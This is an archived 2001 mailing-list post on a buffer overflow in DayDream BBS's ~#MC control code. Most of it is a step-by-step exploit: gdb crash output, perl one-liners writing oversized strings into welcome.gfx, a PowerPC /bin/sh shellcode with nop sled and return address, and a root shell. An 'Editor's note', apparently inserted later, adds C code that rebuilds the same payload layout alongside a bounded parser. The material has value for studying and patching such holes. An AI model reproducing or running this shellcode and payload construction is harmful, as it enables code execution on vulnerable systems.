DayDream BBS buffer overflows

From: KF (dotslashat_private)
Date: Sun Dec 30 2001 - 10:35:17 PST


    Here is some information on a hole that was fixed in Daydream BBS's last
    revision.

    There are a few changes in the Daydream BBS change log that I thought were worth mentioning:
    
    2001-12-29  Hannu Lyytinen  <hlyytineat_private>      
            * text file control codes ~#MC, ~#TF and ~#RA were
              vulnerable to buffer overflow attack. Although there
              are no known exploits, an attacker could run arbitrary
              code on whatever UID DayDream was running on.
    
    2001-12-27  Hannu Lyytinen  <hlyytineat_private>
     
            * fixed buffer overflow bug in ~#MC command.
    
    Now here is a little background about these issues... 
    
    /root/daydream-2.13/docshtml/setup.html:
    
       You can have the following control codes in your text files
       Action codes
    
       ~#MC[COMMAND]|
              Menu command
    
       ~#TF[FILE]|
              Show textfile
     
       ~#RA[FILE]|[max]|
              Show random textfile. Format for file is "/path/foobar%d.ext",
              where %d is a random number (1-[max]).
    
    Well, here's my first attempt to exploit this ... looks UGLY.. the stack
    was totally obliterated!@#@ I have never seen destruction like this to
    my ppc stack. *grin*
    
    Program received signal SIGILL, Illegal instruction.
    0x41414140 in ?? ()
    (gdb) bt
    #0  0x41414140 in ?? ()
    (gdb) i r
    r0             0x41414141       1094795585
    r1             0x7fffda90       2147474064
    r2             0xd3fec000       -738279424
    r3             0x1      1
    r4             0x10053890       268777616
    r5             0x100538a0       268777632
    r6             0x10     16
    r7             0x2      2
    r8             0xff87d10        267943184
    r9             0x10040000       268697600
    r10            0xff87d10        267943184
    r11            0x0      0
    r12            0x2      2
    r13            0x10047440       268727360
    r14            0x0      0
    r15            0x7ffff874       2147481716
    r16            0x1      1
    r17            0x10040000       268697600
    r18            0x10040000       268697600
    r19            0x10040000       268697600
    r20            0x10040000       268697600
    r21            0x10040000       268697600
    r22            0x10040000       268697600
    r23            0x41414141       1094795585
    r24            0x41414141       1094795585
    r25            0x41414141       1094795585
    r26            0x41414141       1094795585
    r27            0x41414141       1094795585
    r28            0x41414141       1094795585
    r29            0x41414141       1094795585
    r30            0x41414141       1094795585
    r31            0x41414141       1094795585
    pc             0x41414140       1094795584
    ps             0x8d032  577586
    cr             0x28822828       679618600
    lr             0x41414141       1094795585
    ctr            0x0      0
    xer            0x20000000       536870912
    
    This was accomplished by the following ... 
    [root@linuxppc bbs]# cat display/iso/welcome.gfx  | more
    ~#MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<9000 A's>|
    
    The sweet spot is here... 
    [root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1596'`\|> display/iso/welcome.gfx
    
    Ignore my username here ... I was trying to mess with format issues if
    any existed...
    
    [root@linuxppc bbs]# ./daydream   
    DayDream BBS/Unix 2.13
    Programming by Antti Häyrynen 1996-1997, DayDream Development Team
    1998-2001
    You are connected to node #10 at 57600 BPS.
                         ˇ| All accounts deleted - login |ˇ
                         :|           as NEW!            |:
                        .:|                              |:.
                 . ....:::|      NEW / CHAT / LOGOFF     |:::.... .
                          `------------------------------'
     
    Username: %p
    Password: **
     
    Segmentation fault (core dumped)
    
    (gdb) bt
    #0  0x0fece418 in free () from /lib/libc.so.6
    #1  0x1001e3f0 in dotype (filename=0x58550 <Address 0x58550 out of bounds>, flags=35) at typetext.c:639
    #2  0x1001d0c4 in find_and_type_file (name_comps=0x100537d0, flags=1094795585) at typetext.c:284
    #3  0x1001d2ac in typefile (filename=0x7fffdbb0 "", flags=35) at typetext.c:348
    #4  0x1001d3c8 in TypeFile (typethis=0x1002a2dc "welcome", flags=35) at typetext.c:380
    #5  0x10009b48 in enterbbs () at enterbbs.c:102
    #6  0x10003124 in getin () at daydream.c:401
    #7  0x10002e9c in visit_bbs (m=0) at daydream.c:310
    #8  0x10002b24 in visitbbs (m=0) at daydream.c:210
    #9  0x10002a98 in main (argc=1, argv=0x7ffff864) at daydream.c:198
    #10 0x0fe71b90 in __libc_start_main () from /lib/libc.so.6
    
    Now we feed it some more to find the Instruction Pointer
    
    [root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1614'`\|> display/iso/welcome.gfx

    echo "~#MC"`perl -e 'print "A" x 1615'`Z\|> display/iso/welcome.gfx
    Program received signal SIGILL, Illegal instruction.
    0x41414158 in ?? ()
    
    
    43 byte shellcode... 
    "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68"
    
    That leaves 1572 bytes in the buffer, or 393 nops plus the need for one pad char.
    
    Here's our first try ... 
    
    [root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x41\x41\x41\x41"'`\| > /home/bbs/display/iso/welcome.gfx
    
    Our return is in $r1 
    (gdb) x/10s $r1
    0x7fffda90:      "/shAAAA"
    
    Let's find the start of the nops
    (gdb) x/10s $r1-1615
    0x7fffd441:      "˙Ú\220\020\001Ö´`iii`iii`iii`iii`iii`i
    
    Here is perfect nop alignment. 
    (gdb) x/40x $r1-1608
    0x7fffd448:     0x60696969
    
    0x7fffd448 is where our code lies, so let's change the return in our mal string
    
    [root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x7f\xff\xd4\xd8"'`\| > /home/bbs/display/iso/welcome.gfx
    
                         ˇ| All accounts deleted - login |ˇ
                         :|           as NEW!            |:
                        .:|                              |:.
                 . ....:::|      NEW / CHAT / LOGOFF     |:::.... .
                          `------------------------------'
     
    Username: %p
    Password: **
    sh-2.05#
    
    -KF
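Editor's note: the block below is an added example, not code from KF's post and not DayDream BBS source. It models the bug class the post describes (an action code such as ~#MC[COMMAND]| copied from an attacker-controlled display file into a fixed stack buffer), puts a bounded parser beside it, and reproduces the offset arithmetic from the post: a 1615-byte probe plus 'Z' lands in the low byte of the saved link register, so the 392 nops, 43-byte shellcode, one pad byte and big-endian return address total 1616 bytes. The function names, the CMD_MAX buffer size and the shape of the copy loop are assumptions; typetext.c's real code is not reproduced.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CMD_MAX 256   /* assumed size of the fixed stack buffer */

/* Vulnerable model (assumed shape, not DayDream's code): everything between
 * "~#MC" and '|' is copied into a fixed stack buffer with no length check,
 * so a display file with a few thousand bytes after the code overwrites the
 * saved link register, which is what pc = 0x41414158 in the post shows.
 * Kept for contrast only; never feed it over-long input. */
static int parse_mc_unsafe(const char *p, char *out, size_t outlen)
{
    char cmd[CMD_MAX];
    size_t i = 0;

    if (strncmp(p, "~#MC", 4) != 0)
        return -1;
    p += 4;
    while (*p && *p != '|')
        cmd[i++] = *p++;            /* no bound against sizeof cmd */
    cmd[i] = '\0';
    snprintf(out, outlen, "%s", cmd);
    return (int)i;
}

/* Hardened model: measure first, reject (do not truncate) an argument that
 * would not fit or has no closing '|', and leave the caller's buffer
 * untouched on failure. Returns the argument length or -1. */
static int parse_mc_safe(const char *p, char *out, size_t outlen)
{
    size_t i = 0;

    if (outlen == 0 || strncmp(p, "~#MC", 4) != 0)
        return -1;
    p += 4;
    while (p[i] && p[i] != '|') {
        if (i + 1 >= outlen)        /* would overrun: refuse the code */
            return -1;
        i++;
    }
    if (p[i] != '|')                /* unterminated code */
        return -1;
    memcpy(out, p, i);
    out[i] = '\0';
    return (int)i;
}

/* The probe from the post: "~#MC", n bytes of 'A', then "Z|". Caller frees. */
static char *build_probe(size_t n)
{
    char *buf = malloc(4 + n + 3);
    if (!buf)
        return NULL;
    memcpy(buf, "~#MC", 4);
    memset(buf + 4, 'A', n);
    memcpy(buf + 4 + n, "Z|", 3);   /* includes the terminating NUL */
    return buf;
}

/* 4-byte filler the post uses as its nop sled element (0x60696969). */
static const unsigned char nop[4] = { 0x60, 0x69, 0x69, 0x69 };

/* The 43-byte PowerPC shellcode quoted in the post (ends in "/bin/sh"). */
static const unsigned char shellcode[43] = {
    0x40,0x82,0xff,0xfd, 0x7f,0xe8,0x02,0xa6, 0x3b,0xff,0x01,0x2c,
    0x38,0x7f,0xfe,0xf4, 0x90,0x61,0xff,0xf8, 0x90,0xa1,0xff,0xfc,
    0x3b,0xc0,0x16,0x01, 0x7f,0xc0,0x4e,0x70, 0x44,0xff,0xff,0x02,
    0x2f,0x62,0x69,0x6e, 0x2f,0x73,0x68
};

#define NOP_COUNT 392
#define RET_OFF   (NOP_COUNT * 4 + sizeof shellcode + 1)   /* 1568 + 43 + 1 = 1612 */

/* Body that follows "~#MC" in the final welcome.gfx (the trailing '|' is not
 * included): nops, shellcode, one pad byte, then the big-endian return
 * address. The 1615-'A' probe put 'Z' in the last byte of the LR, so the LR
 * occupies offsets 1612..1615 and the body is 1616 bytes. Returns the body
 * length, or 0 if cap is too small. */
static size_t exploit_layout(unsigned char *body, size_t cap,
                             unsigned int ret, size_t *ret_off)
{
    size_t i, n = RET_OFF + 4;

    if (cap < n)
        return 0;
    for (i = 0; i < NOP_COUNT; i++)
        memcpy(body + 4 * i, nop, 4);
    memcpy(body + 4 * NOP_COUNT, shellcode, sizeof shellcode);
    body[RET_OFF - 1] = 'A';                            /* pad byte */
    body[RET_OFF + 0] = (unsigned char)(ret >> 24);     /* PowerPC: big-endian */
    body[RET_OFF + 1] = (unsigned char)(ret >> 16);
    body[RET_OFF + 2] = (unsigned char)(ret >> 8);
    body[RET_OFF + 3] = (unsigned char)(ret);
    *ret_off = RET_OFF;
    return n;
}

int main(void)
{
    char out[CMD_MAX];
    char *probe = build_probe(1615);
    unsigned char body[2048];
    size_t off = 0, n;

    printf("safe  : %d\n", parse_mc_safe("~#MCLOGOFF|", out, sizeof out));
    printf("probe : %d\n", parse_mc_safe(probe, out, sizeof out));  /* rejected */
    n = exploit_layout(body, sizeof body, 0x7fffd4d8u, &off);
    printf("layout: %zu bytes, return address at offset %zu\n", n, off);
    free(probe);
    return 0;
}
```

The two parsers differ in one decision: the hardened one measures the argument against the destination before copying anything and refuses an over-long or unterminated code outright, which is what a fix in typetext.c needs to do for ~#MC, ~#TF and ~#RA alike. Truncating instead of refusing would keep the stack intact but silently run or display something other than what the sysop wrote.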
    



    This archive was generated by hypermail 2b30 : Sun Dec 30 2001 - 17:50:42 PST